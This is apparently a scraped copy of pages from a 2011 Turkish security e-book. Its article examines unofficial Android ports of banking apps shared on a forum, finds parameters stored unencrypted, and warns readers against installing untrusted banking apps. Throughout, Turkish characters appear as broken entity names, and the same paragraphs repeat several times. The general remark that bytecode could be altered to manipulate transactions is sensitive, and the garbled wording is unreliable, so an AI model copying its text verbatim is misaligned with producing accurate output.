Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 53: Hack 4 Career - 2011

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 54: Hack 4 Career - 2011

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 55: Hack 4 Career - 2011

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 56: Hack 4 Career - 2011

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi